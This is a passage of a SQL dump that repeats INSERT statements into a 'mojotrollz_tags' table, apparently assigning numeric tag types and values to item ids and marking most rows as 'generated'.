`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136959, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136961, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136962, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136963, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (136964, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (137644, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (137646, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (137647, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (138316, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (138317, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (138318, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (138492, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (138496, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (138497, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (138498, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (138614, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (139852, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140105, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140109, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140110, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140111, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140112, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140113, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140211, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140212, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140213, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140214, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140357, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140358, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140359, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140360, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140372, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140373, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140374, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140375, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140376, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140378, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140379, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140380, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140381, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140382, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140383, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140384, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140385, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140386, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140387, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140388, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140389, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140390, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140391, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140392, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140393, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140394, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140395, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140396, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140397, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140398, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140399, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140400, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140401, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140402, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140403, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140439, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140911, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140931, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (140971, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141069, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141070, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141070, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141071, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141071, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141072, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141072, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141073, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141073, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141074, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141074, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141596, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141596, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141610, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141611, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141812, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141813, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141832, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141832, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141838, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141839, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141840, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141841, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141843, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141844, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141845, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141851, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141851, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141852, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141852, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141853, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141857, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141858, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141859, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141860, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141861, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141862, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141863, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141869, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141869, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141870, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141871, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141931, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141971, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141972, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141979, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141979, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141980, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (141981, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142018, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142019, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142020, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142021, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142036, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142071, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142073, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142075, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142076, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142077, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142078, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142079, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142088, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142088, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142089, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142090, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142091, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142093, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142094, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142095, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142101, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142102, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142103, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142109, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142110, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142111, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142117, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142118, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142119, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142121, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142122, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142123, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142124, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142127, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142131, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142139, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142140, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142141, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142142, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142143, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142144, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142144, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142144, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142144, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142145, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142145, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142145, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142145, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142151, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142172, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142175, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142176, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142179, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142181, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142184, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142185, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142186, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142187, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142188, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142189, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142191, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142195, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142196, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142197, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142198, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142207, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142207, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142208, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142208, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142209, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142209, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142210, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142210, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142211, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142211, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142212, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142212, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142213, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142213, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142214, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142214, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142215, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142215, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142216, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142216, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142217, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142217, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142218, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142218, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142219, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142219, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142339, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142340, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142341, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142342, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142343, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142344, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142344, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142345, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142475, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142475, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142476, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142476, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142477, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142477, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142487, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142487, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142488, 2, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142488, 2, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142689, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142690, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142691, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142692, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142693, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142694, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142695, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142696, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142696, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142702, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142703, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142704, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142705, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142706, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (142707, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` 